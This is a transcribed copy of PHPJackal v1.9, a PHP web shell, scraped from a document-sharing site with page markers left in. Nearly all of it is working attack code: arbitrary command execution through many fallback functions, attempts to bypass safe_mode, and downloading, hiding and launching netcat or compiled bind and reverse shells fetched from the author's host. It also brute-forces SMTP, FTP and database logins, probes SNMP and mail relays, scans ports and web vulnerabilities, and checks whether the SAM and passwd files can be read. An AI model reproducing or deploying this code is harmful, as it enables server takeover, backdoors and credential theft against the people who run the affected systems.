php jackal
Post on 16-Jul-2015
122 Views
Preview:
TRANSCRIPT
-
5/13/2018 Php Jackal
1/39
-
5/13/2018 Php Jackal
2/39
elseif(function_exists('socket_set_timeout')){$scan=fsockopen("udp://$ip",$port);if($scan){socket_set_timeout($scan,$timeout);fwrite($scan,"\x00");$s=time();fread($scan,1);
if((time()-$s)>=$timeout){fclose($scan);return 1;}}}return 0;}if(!function_exists('is_executable')){function is_executable($addr){return 0;}}if(!function_exists('file_get_contents')){function file_get_contents($addr){
$a=fopen($addr,'r');$tmp=fread($a,filesize($a));fclose($a);if($a)return $tmp;else return null;}}if(!function_exists('file_put_contents')){function file_put_contents($addr,$con){$a=fopen($addr,'w');if(!$a)return 0;$t=fwrite($a,$con);fclose($a);if($t)return strlen($con);
return 0;}}function file_add_contentS($addr,$con){$a=fopen($addr,'a');if(!$a)return 0;fwrite($a,$con);fclose($a);return strlen($con);}if(!empty($_REQUEST['chmoD']) && !empty($_REQUEST['modE']))chmod($_REQUEST['chmoD'],'0'.$_REQUEST['modE']);
if(!empty($_REQUEST['downloaD'])){ob_clean();$dl=$_REQUEST['downloaD'];$con=file_get_contents($dl);header('Content-type: application/octet-stream');header("Content-disposition: attachment; filename=\"$dl\";");header('Content-length: '.strlen($con));echo $con;exit;}if(!empty($_REQUEST['imagE'])){$img=$_REQUEST['imagE'];header('Content-type: imagE/gif');
header("Content-length: ".filesize($img));header("Last-Modified: ".date('r',filemtime($img)));echo file_get_contents($img);
-
5/13/2018 Php Jackal
3/39
exit;}if(!empty($_REQUEST['exT'])){$ex=$_REQUEST['exT'];$e=get_extension_funcs($ex);echo ''.htmlspecialchars($ex).'Functions:
';foreach($e as $k=>$f){$i=$k+1;echo "$i)$f ";if(in_array($f,$disablefunctions))echo 'DISABLED';echo '
';}echo '';exit;}function showsizE($size){if($size>=1073741824)$size=round(($size/1073741824),2).' GB';elseif($size>=1048576)$size=round(($size/1048576),2).' MB';elseif($size>=1024)$size=round(($size/1024),2).' KB';else $size.=' B';return $size;}$windows=(substr((strtoupper(php_uname())),0,3)=='WIN')?1:0;$errorbox="Error: ";$v='1.9';$cwd=getcwd();$msgbox="
";$intro="Script:
".str_repeat('-=-',25)."
Name: PHPJackal
Version: $v
Author:
".str_repeat('-=-',25)."
Name: NetJackal
Country: Iran
Website: http://netjackal.by.ru/
Email: nima_501@yahoo.com
".str_repeat('-=-',25)."
Error: Enable JavaScript in your browser!!!$et";$footer="${msgbox}PHPJackal v$v - Powered By NetJackal$et";$hcwd="";$t="";$crack="Dictionary:Dictionary type:Simple (P)Combo (U:P)Username:Server:Log $hcwd $et";function checkfunctioN($func){global $disablefunctions,$safemode;$safe=array('passthru','system','exec','shell_exec','popen','proc_open');
if($safemode=='ON' && in_array($func,$safe))return 0;elseif(function_exists($func) && is_callable($func) && !in_array($func,$disablefunctions))return 1;
-
5/13/2018 Php Jackal
4/39
return 0;}function whereistmP(){$uploadtmp=ini_get('upload_tmp_dir');$uf=getenv('USERPROFILE');$af=getenv('ALLUSERSPROFILE');$se=ini_get('session.save_path');
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';if(is_dir($uf) && is_writable($uf))return $uf;if(is_dir($af) && is_writable($af))return $af;if(is_dir($se) && is_writable($se))return $se;if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;return '.';}function shelL($command){
global $windows;$exec=$output='';$dep[]=array('pipe','r');$dep[]=array('pipe','w');if(checkfunctioN('passthru')){ob_start();passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}elseif(checkfunctioN('system')){$tmp=ob_get_contents();ob_clean();system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}elseif(checkfunctioN('exec')){exec($command,$output);$output=join("\n",$output);$exec=$output;}elseif(checkfunctioN('shell_exec'))$exec=shell_exec($command);elseif(checkfunctioN('popen')){$output=popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}elseif(checkfunctioN('proc_open')){$res=proc_open($command,$dep,$pipes);while(!f
eof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}elseif(checkfunctioN('win_shell_execute'))$exec=winshelL($command);elseif(checkfunctioN('win32_create_service'))$exec=srvshelL($command);elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command);elseif(is_object($ws=new COM('WScript.Shell')))$exec=comshelL($command,$ws);elseif(extension_loaded('perl'))$exec=perlshelL($command);return $exec;}function getiT($get){$fo=strtolower(ini_get('allow_url_fopen'));$ui=strtolower(ini_get('allow_url_include'));
if($fo $fo=='on')$con=file_get_contents($get);elseif($ui $ui=='on'){ob_start();include($get);$con=ob_get_contents();ob_end_clean();}else{$u=parse_url($get);$host=$u['host'];$file=(empty($u['path']))?'/':$u['path'];$port=(empty($u['port']))?80:$u['port'];$url=fsockopen($host,$port,$en,$es,12);fputs($url,"GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nRefere
r: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");$tmp=$con='';
-
5/13/2018 Php Jackal
5/39
while($tmp!="\r\n")$tmp=fgets($url);while(!feof($url))$con.=fgets($url);}return $con;}function downloadiT($get,$put){$con=getiT($get);
$mk=file_put_contents($put,$con);if($mk)return 1;return 0;}function winshelL($command){$name=whereistmP()."\\".uniqid('NJ');win_shell_execute('cmd.exe','',"/C $command >\"$name\"");sleep(1);$exec=file_get_contents($name);unlink($name);return $exec;}
function ffishelL($command){$name=whereistmP()."\\".uniqid('NJ');$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);while(!file_exists($name))sleep(1);$exec=file_get_contents($name);unlink($name);return $exec;}function srvshelL($command){$name=whereistmP()."\\".uniqid('NJ');$n=uniqid('NJ');$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['Com
Spec'];win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));win32_start_service($n);win32_stop_service($n);win32_delete_service($n);while(!file_exists($name))sleep(1);$exec=file_get_contents($name);unlink($name);return $exec;}function comshelL($command,$ws){
$exec=$ws->exec("cmd.exe /c $command");$so=$exec->StdOut();return $so->ReadAll();}function perlshelL($command){$perl=new perl();ob_start();$perl->eval("system('$command')");$exec=ob_get_contents();ob_end_clean();return $exec;}function smtpchecK($addr,$user,$pass,$timeout){
$sock=fsockopen($addr,25,$n,$s,$timeout);if(!$sock)return -1;fread($sock,1024);
-
5/13/2018 Php Jackal
6/39
fputs($sock,'ehlo '.uniqid('NJ')."\r\n");$res=substr(fgets($sock,512),0,1);if($res!='2')return 0;fgets($sock,512);fgets($sock,512);fgets($sock,512);fputs($sock,"AUTH LOGIN\r\n");$res=substr(fgets($sock,512),0,3);if($res!='334')return 0;
fputs($sock,base64_encode($user)."\r\n");$res=substr(fgets($sock,512),0,3);if($res!='334')return 0;fputs($sock,base64_encode($pass)."\r\n");$res=substr(fgets($sock,512),0,3);if($res!='235')return 0;return 1;}function mysqlchecK($host,$user,$pass,$timeout){if(function_exists('mysql_connect')){$l=mysql_connect($host,$user,$pass);if($l)return 1;
}return 0;}function mssqlchecK($host,$user,$pass,$timeout){if(function_exists('mssql_connect')){$l=mssql_connect($host,$user,$pass);if($l)return 1;}return 0;}function checksmtP($host,$timeout){$from=strtolower(uniqid('nj')).'@'.strtolower(uniqid('nj')).'.com';$sock=fsockopen($host,25,$n,$s,$timeout);
if(!$sock)return -1;$res=substr(fgets($sock,512),0,3);if($res!='220')return 0;fputs($sock,'HELO '.uniqid('NJ')."\r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;fputs($sock,"MAIL FROM: \r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;fputs($sock,"RCPT TO: \r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;
fputs($sock,"DATA\r\n");$res=substr(fgets($sock,512),0,3);if($res!='354')return 0;fputs($sock,"From: ".uniqid('NJ')." ".uniqid('NJ')." \r\nSubject: ".uniqid('NJ')."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".uniqid('Hello ',true)."\r\n.\r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;return 1;}function replace_stR($s,$h){$ret=$h;foreach($s as $k=>$r)$ret=str_replace($k,$r,$ret);
return $ret;}function check_urL($url,$method,$search='200',$timeout=3){
-
5/13/2018 Php Jackal
7/39
$u=parse_url($url);$method=strtoupper($method);$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];$data=(!empty($u['query']))?$u['query']:'';if(!empty($data))$data="?$data";$sock=fsockopen($host,$port,$en,$es,$timeout);
if($sock){fputs($sock,"$method $file$data HTTP/1.0\r\n");fputs($sock,"Host: $host\r\n");if($method=='GET')fputs($sock,"\r\n");elseif($method=='POST')fputs($sock,'Content-Type: application/x-www-form-urlencoded\r\nContent-length: '.strlen($data)."\r\nAccept-Encoding: text\r\nConnection:close\r\n\r\n$data");else return 0;if($search=='200')if(strstr(fgets($sock),'200')){fclose($sock);return 1;}else{fclose($sock);return 0;}while(!feof($sock)){$res=fgets($sock);
if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}}fclose($sock);}return 0;}function get_sw_namE($host,$timeout){$sock=fsockopen($host,80,$en,$es,$timeout);if($sock){$page=uniqid('NJ');fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");while(!feof($sock)){$con=fgets($sock);
if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}}fclose($sock);return -1;}return 0;}function snmpchecK($ip,$com,$timeout){$res=0;$n=chr(0x00);$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01).chr(0x00).chr(0x04).chr(strlen($com)).$com.chr(0xA0).chr(0x19).chr(0x02).chr(0x01).chr(0x01).chr(0x02).chr(0x01).$n.chr(0x02).chr(0x01).$n.chr(0x30).chr(0x0E).chr(0x30).chr(0x0C).chr(0x06).chr
(0x08).chr(0x2B).chr(0x06).chr(0x01).chr(0x02).chr(0x01).chr(0x01).chr(0x01).$n.chr(0x05).$n;$sock=fsockopen("udp://$ip",161);if(function_exists('socket_set_timeout'))socket_set_timeout($sock,$timeout);fputs($sock,$packet);socket_set_timeout($sock,$timeout);$res=fgets($sock);fclose($sock);if($res != '')return 1;else return 0;}$safemode=(ini_get('safe_mode') strtolower(ini_get('safe_mode'))=='on')?'ON':'OFF';if($safemode=='ON'){ini_restore('safe_mode');ini_restore('open_basedir');}
function brshelL(){global $errorbox,$windows,$et,$hcwd;$_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0;
-
5/13/2018 Php Jackal
8/39
$addr='http://netjackal.by.ru/br';$error="$errorbox Can not make backdoor file, go to writeable folder.$et";$n=uniqid('NJ_');if(!$windows)$n=".$n";$d=whereistmP();$name=$d.DIRECTORY_SEPARATOR.$n;$c=($_REQUEST['C'])?1:0;
if(!empty($_REQUEST['port']) && ($_REQUEST['port']=1)){$port=(int)$_REQUEST['port'];if($windows){if($c){$name.='.exe';$bd=downloadiT("$addr/nc",$name);shelL("attrib +H $name");if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe");}else{$name=$name.'.pl';$bd=downloadiT("$addr/winbind.p",$name);
shelL("attrib +H $name");if(!$bd)echo $error;else shelL("perl $name $port");}}else{if($c){$bd=downloadiT("$addr/bind.c",$name);if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &");}else{$bd=downloadiT("$addr/bind.p",$name);if(!$bd)echo $error;else shelL("cd $d;perl $n $port &");echo "Backdoor is waiting for you on $port.
";}}}elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']=1) && !empty($_REQUEST['ip'])){$ip=$_REQUEST['ip'];$port=(int)$_REQUEST['rport'];if($windows){if($c){$name.='.exe';$bd=downloadiT("$addr/nc",$name);shelL("attrib +H $name");
if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe");}else{$name=$name.'.pl';$bd=downloadiT("$addr/winrc.p",$name);shelL("attrib +H $name");if (!$bd)echo $error;else shelL("perl.exe $name $ip $port");}}else{if($c){$bd=downloadiT("$addr/rc.c",$name);if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &");
}else{$bd=downloadiT("$addr/rc.p",$name);if(!$bd)echo $error;else shelL("cd $d;perl $n $ip $port &");
-
5/13/2018 Php Jackal
9/39
}}echo 'Done!';}else{echo "Bind shell:Port:
Type:PERL";if($windows)echo 'EXE';else echo 'C';echo"$hcwd$etReverse shell:IP:Port:Type:PERL";if($windows)echo 'EXE';else echo 'C';echo"$hcwd$et$et";}}function showimagE($img){echo "";}function editoR($file){global $errorbox,$et,$hcwd,$cwd;if(is_file($file)){if(!is_readable($file)){echo "$errorbox File is not readable$et
";}if(!is_writeable($file)){echo "$errorbox File is not writeable$et
";}$data=file_get_contents($file);echo "$hcwd$et
";echo htmlspecialchars($data);echo "";}else {echo "$hcwd$et
";}echo "$hcwd$et";}function webshelL(){global $windows,$hcwd,$et,$cwd;if($windows){
-
5/13/2018 Php Jackal
10/39
$alias="Display open portsList of processesSystem informationIP configurationGet MAC addressServices listMachines in domainUserslistTurn off the server";}
else{$alias="Display open portsShow last 250 logged in usersDownloadersFind world-writable directoriesFind world-writable directories(in current directory)Find world-writable filesFind world-writable files(in current directory)Find files with SUID bit setFind files with SGID bit setFind .htpasswd filesFind .bash_history filesView syslog.confView hostsList of processes";if(is_dir('/etc/valiases'))$alias.="List ofcPanel`s domains(valiases)";if(is_dir('/etc/vdomainaliases'))$alias.="List cPanel`s domains(vdomainaliases)";if(file_exists('/var/cpanel/accounting.log'))$alias.="Display cPanel`s log";if(is_dir('/var/spool/mail/'))$alias.="Mailboxes list";}echo "Location:$et
Web Shell:";if(!empty($_REQUEST['cmd']))echo shelL($_REQUEST['cmd']);echo"$hcwd$alias$hcwd$et";}function maileR(){global $msgbox,$et,$hcwd;if(!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){$to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body'];if(mail($to,$subject,$body,"From: $from"))echo "$msgboxMail sent!
$et";}echo "
Mailer:SMTP".ini_get('SMTP').' ('.ini_get('smtp_port').")From:$hcwdTo: -
5/13/2018 Php Jackal
11/39
r='#666666'>Subject:Body:$et";
}function scanneR(){global $hcwd,$et;if(!empty($_SERVER['SERVER_ADDR']))$host=$_SERVER['SERVER_ADDR'];else $host='127.0.0.1';$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;if(($udp$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport'])&& !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){$target=$_REQUEST['target'];$from=(int)$_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu=0;echo 'Port scanning started against '.htmlspecialchars($target)
.':
';$start=time();for($i=$from;$i -
5/13/2018 Php Jackal
12/39
if(strstr($port,','))$p=explode(',',$port);else $p[0]=$port;$open=$ser='';foreach($p as $po){$scan=checkthisporT($ip,$po,$timeout);if($scan){$ser='';if($ser=getservbyport($po,'tcp'))$ser="($ser)";
$open.=" $po$ser ";}}if($open){echo "$ip) Open ports:$open
";$output=1;}}if(!empty($_REQUEST['httpbanner'])){$res=get_sw_namE($ip,$timeout);if($res){echo "$ip) Webserver software: ";if($res==-1)echo 'Unknow';else echo $res;
echo '
';$output=1;}}if(!empty($_REQUEST['httpscanner'])){if(checkthisporT($ip,80,$timeout) && !empty($file)){$admin=array('/admin/','/adm/');$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');foreach($file as $v){$vuln=array();$v=trim($v);if(!$v $v{0}=='#')continue;$v=str_replace('","','^',$v);$v=str_replace('"','',$v);$vuln=explode('^',$v);$page=$cqich=$nukech=$adminch=$userch=$vuln[1];if(strstr($page,'@CGIDIRS'))foreach($cgi as $cg){$cqich=str_replace('@CGIDIRS',$cg,$page);
$url="http://$ip$cqich";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}}elseif(strstr($page,'@ADMINDIRS'))foreach($admin as $cg){$adminch=str_replace('@ADMINDIRS',$cg,$page);$url="http://$ip$adminch";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}}elseif(strstr($page,'@USERS'))foreach($users as $cg){$userch=str_replace('@USERS',$cg,$page);
-
5/13/2018 Php Jackal
13/39
$url="http://$ip$userch";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}}elseif(strstr($page,'@NUKE'))foreach($nuke as $cg){$nukech=str_replace('@NUKE',$cg,$page);$url="http://$ip$nukech";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}}else{$url="http://$ip$page";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}}}}}if(!empty($_REQUEST['smtprelay'])){if(checkthisporT($ip,25,$timeout)){$res='';$res=checksmtP($ip,$timeout);if($res==1){echo "$ip) SMTP relay found.
";$output=1;}}}if(!empty($_REQUEST['snmpscanner'])){if(checkthisporT($ip,161,$timeout,1)){$com=$_REQUEST['com'];$coms=$res='';if(strstr($com,','))$c=explode(',',$com);else $c[0]=$com;foreach($c as $v){$ret=snmpchecK($ip,$v,$timeout);if($ret)$coms.=" $v ";}if($coms!=''){echo "$ip) SNMP FOUND: $coms
";$output=1;}}}if(!empty($_REQUEST['ftpscanner']) && function_exists('ftp_connect')){if(checkthisporT($ip,21,$timeout)){$usps=explode(',',$_REQUEST['userpass']);foreach($usps as $v){$user=substr($v,0,strpos($v,':'));$pass=substr($v,strpos($v,':')+1);if($pass=='[BLANK]')$pass='';$ftp=ftp_connect($ip,21,$timeout);if($ftp){if(ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) System type: ".ftp_systype($ftp)." (Connect)
";}}}}}if($output)echo '';}
-
5/13/2018 Php Jackal
14/39
$time=time()-$start;echo "Done! ($time seconds)";if(!empty($buglist))unlink($buglist);}elseif(!empty($_REQUEST['directoryscanner'])){$dir=file($_REQUEST['dic']);$host=$_REQUEST['host'];$r=$_REQUEST['r1'];echo "Scanning started...\n";
for($i=0;$i
-
5/13/2018 Php Jackal
15/39
bgcolor='#808080'>Get web bannerWebserver security scanningSMTP relay checkFTP password:SNMP:$et";}}function sysinfO(){global $windows,$disablefunctions,$cwd,$safemode;$t8="";$t6="";$mil="
-
5/13/2018 Php Jackal
16/39
$os=php_uname();$osn=php_uname('s');if(!$windows){$ker=php_uname('r');$o=($osn=='Linux')?'Linux+Kernel':$osn;$os=str_replace($osn,"${mil}$o'>$osn",$os);$os=str_replace($ker,"${mil}Linux+Kernel'>$ker",$os);
$inpa=':';}else{$sam=$sysroot."\\system32\\config\\SAM";$inpa=';';$os=str_replace($osn,"${mil}MS+Windows'>$osn",$os);}$cuser=get_current_user();if(!$cuser)$cuser='Unknow';$software=str_replace('Apache',"${mil}Apache'>Apache",$_SERVER['SERVER_SOFTWARE']);echo "Server information:${t6
}Server:".$_SERVER['HTTP_HOST'];if(!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "${t8}Operation system:$os$osver${t6}Web server application:$software${t8}CPU:$CPU${t6}Disk status:$disksize${t8}User domain:";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "${t6}User name:$cuser";if($windows){echo "${t8}Windows directory:$sysroot${t6}Sam file:";if(is_readable(($sam)))echo "Readable"; else echo 'Not readabl
e';echo '';}else{echo "${t8}UID - GID:".getmyuid().' - '.getmygid()."${t6}Recommended local root exploits:$xpl${t8}Passwd file:";if(is_readable('/etc/passwd'))echo "Readable";else echo'Not readable';echo "${t6}${mil}cpanel'>cPanel:";$cp='/usr/local/cpanel/version';$cv=(file_exists($cp) && is_writable($cp))?trim(file_get_contents($cp)):'Unknow';echo "$cv (Log file: ";
if(file_exists('/var/cpanel/accounting.log')){if(is_readable('/var/cpanel/accounting.log'))echo "Readable";else echo 'Not readable';}else echo 'Not found';echo ')';}echo "$t8${mil}PHP'>PHP version:".PHP_VERSION." (more...)${t6}Zend version:";if (function_exists('zend_version')) echo "".zend_version().'';else echo 'Not Found';echo "${t8}Include path:".str_replace($inpa,'',DEFAULT_INCLUDE_PATH)."${t6}PHP Modules:";$ext=get_loaded_extensions();foreach($ext as $v){$i=phpversion($v);if(!empty($i)
)$i="($i)";$l=hlinK("exT=$v");echo "$v $i ";}echo "${t8}Disabled functions:";if(!empty($ds))echo "$d
-
5/13/2018 Php Jackal
17/39
s ";else echo 'Nothing'; echo"${t6}Safe mode:$safemode${t8}Open base dir:$basedir${t6}DBMS:";$sq='';if(function_exists('mysql_connect')) $sq= "${mil}MySQL'>MySQL ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL'>MSSQL ";if(function_exists('ora_logon')) $sq.=" ${mil}Oracle'>Oracle ";if(function_exists('sqlite_open')) $sq.= ' SQLite ';if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL'>PostgreSQL ";if
(function_exists('msql_connect')) $sq.= ' mSQL ';if(function_exists('mysqli_connect'))$sq.= ' MySQLi ';if(function_exists('ovrimos_connect')) $sq.= ' Ovrimos SQL ';if ($sq=='') $sq= 'Nothing'; echo "$sq";}function checksuM($file){global $et;echo "MD5: ".md5_file($file).'
SHA1:'.sha1_file($file)."$et";}function listdiR($cwd,$task){$c=getcwd();$dh=opendir($cwd);while($cont=readdir($dh)){if($cont=='.' $cont=='..')continue;$adr=$cwd.DIRECTORY_SEPARATOR.$cont;switch($task){case '0':if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";break;case '1':if(is_writeable($adr)){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;case '2':if(is_file($adr) && is_writeable($adr))echo "[$adr]\n";break;
case '3':if(is_dir($adr) && is_writeable($adr))echo "[$adr]\n";break;case '4':if(is_file($adr))echo "[$adr]\n";break;case '5':if(is_dir($adr))echo "[$adr]\n";break;case '6':if(preg_match('@'.$_REQUEST['search'].'@',$cont) (is_file($adr) && preg_match('@'.$_REQUEST['search'].'@',file_get_contents($adr)))){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;case '7':if(strstr($cont,$_REQUEST['search']) (is_file($adr) && strstr(file_g
et_contents($adr),$_REQUEST['search']))){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;case '8':{if(is_dir($adr))rmdir($adr);else unlink($adr);rmdir($cwd);break;}}if(is_dir($adr))listdiR($adr,$task);}}if(!checkfunctioN('posix_getpwuid')){function posix_getpwuid($u){return 0;}}if(!checkfunctioN('posix_getgrgid')){function posix_getgrgid($g){return 0;}}function filemanageR(){global $windows,$msgbox,$errorbox,$t,$et,$cwd,$hcwd;$table="";$td1n="";$td2m="";
-
5/13/2018 Php Jackal
18/39
$td1i="";$td2i="";$tdnr="";$tdw="";if(!empty($_REQUEST['task'])){if(!empty($_REQUEST['search']))$_REQUEST['task']=7;if(!empty($_REQUEST['re']))$_REQUEST['task']=6;
echo '';listdiR($cwd,$_REQUEST['task']);echo '';}else{if(!empty($_REQUEST['cP']) !empty($_REQUEST['mV']) !empty($_REQUEST['rN'])){if(!empty($_REQUEST['cP']) !empty($_REQUEST['mV'])){$title='Destination';$ad=(!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV'];$dis=(!empty($_REQUEST['cP']))?'Copy':'Move';}else{$ad=$_REQUEST['rN'];
$title='New name';$dis='Rename';}if(!!empty($_REQUEST['deS'])){echo "$title:$td1n$td2m$hcwd$et";}else{if(!empty($_REQUEST['rN']))rename($ad,$_REQUEST['deS']);else{copy($ad,$_REQUEST['deS']);
if(!empty($_REQUEST['mV']))unlink($ad);}}}if(!empty($_REQUEST['deL'])){if(is_dir($_REQUEST['deL']))listdiR($_REQUEST['deL'],8);else unlink($_REQUEST['deL']);}if(!empty($_FILES['uploadfile'])){move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']);echo "$msgboxUploaded! File name: ".$_FILES['uploadfile']['name']." Filesize: ".$_FILES['uploadfile']['size']. "$et
";}$select="--------
-
5/13/2018 Php Jackal
19/39
decoration:none' href='#' onClick=\"HS('div');\">- ] Location:$et";$file=$dir=$link=array();if($dirhandle=opendir($cwd)){while($cont=readdir($dirhandle)){if(is_dir($cwd.DIRECTORY_SEPARATOR.$cont))$dir[]=$cont;
elseif(is_file($cwd.DIRECTORY_SEPARATOR.$cont))$file[]=$cont;else $link[]=$cont;}closedir($dirhandle);sort($file);sort($dir);sort($link);echo "NameOwnerModification timeLast changeInfoSizeActions";$i=0;foreach($dir as $dn){echo '';$i++;$own='Unknow';$owner=posix_getpwuid(fileowner($dn));$mdate=date('Y/m/d H:i:s',filemtime($dn));$adate=date('Y/m/d H:i:s',fileatime($dn));$diraction=$select.hlinK('seC=fm&workingdiR='.realpath($dn))."'>OpenRenameRemove";
if($owner)$own="".$owner['name'].'';if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}if(is_writeable($dn))echo $tdw;elseif(!is_readable($dn))echo $tdnr;else echo $cl2;echo "";if(strlen($dn)>45)echo substr($dn,0,42).'...';else echo $dn;echo '';echo $cl1."$own";echo $cl1."$mdate";echo $cl1."$adate";echo "$cl1";echo "";echo 'D';if(is_readable($dn))echo 'R';if(is_writeable($dn))echo 'W'
;echo '';echo "$cl1------";echo $cl2.$diraction;echo '';}foreach($file as $fn){echo '';$i++;$own='Unknow';$owner=posix_getpwuid(fileowner($fn));$fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."'>OpenEditDownloadHex viewImageInclude
-
5/13/2018 Php Jackal
20/39
value='".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."'>ChecksumCopyMoveRemove";$mdate=date('Y/m/d H:i:s',filemtime($fn));$adate=date('Y/m/d H:i:s',fileatime($fn));if($owner)$own="".$owner['name'].'';$size=showsizE(filesize($fn));if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}if(is_writeable($fn))echo $tdw;elseif(!is_readable($fn))echo $tdnr;else echo $cl2;echo "";if(strlen($fn)>45)echo substr($fn,0,42).'...';else echo $fn;echo '';echo $cl1."$own";echo $cl1."$mdate";echo $cl1."$adate";echo "$cl1";echo "";if(is_readable($fn))echo "R";if(is_writeable($fn))echo "W";if(is_ex
ecutable($fn))echo "X";if(is_uploaded_file($fn))echo "U";echo "";echo "$cl1$size";echo $cl2.$fileaction;echo '';}foreach($link as $ln){$own='Unknow';$i++;$owner=posix_getpwuid(fileowner($ln));$linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."'>OpenEditDownloadHex viewImageIncludeChecksumCopyMoveRenameRemove";$mdate=date('Y/m/d H:i:s',filemtime($ln));$adate=date('Y/m/d H:i:s',fileatime($ln));if($owner)$own="".$owner['name'].'';echo '';
$size=showsizE(filesize($ln));if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}if(is_writeable($ln))echo $tdw;elseif(!is_readable($ln))echo $tdnr;else echo $cl2;echo "";if(strlen($ln)>45)echo substr($ln,0,42).'...';else echo $ln;echo '';echo $cl1."$own";echo $cl1."$mdate";echo $cl1."$adate";echo "${cl1}";echo "L";if(is_readable($ln))echo "R";if (is_writeable($ln))echo "W";if(is_executable($ln))echo "X";echo "";echo "$cl1$size";
echo $cl2.$linkaction;echo '';}
-
5/13/2018 Php Jackal
21/39
}$dc=count($dir)-2;if($dc==-2)$dc=0;$fc=count($file);$lc=count($link);$total=$dc+$fc+$lc;$min=min(substr(ini_get('upload_max_filesize'),0,strpos(ini_get('post_max_size')
,'M')),substr(ini_get('post_max_size'),0,strpos(ini_get('post_max_size'),'M'))).' MB';echo "$tableFind:Regular expressions $hcwd$hcwdDisplay files and directories in current folderFind writable files and directories in current folderFindwritable files in current folderFind writable directories in current folderDisplay all files in current folderDisplay all directories in current folder$et
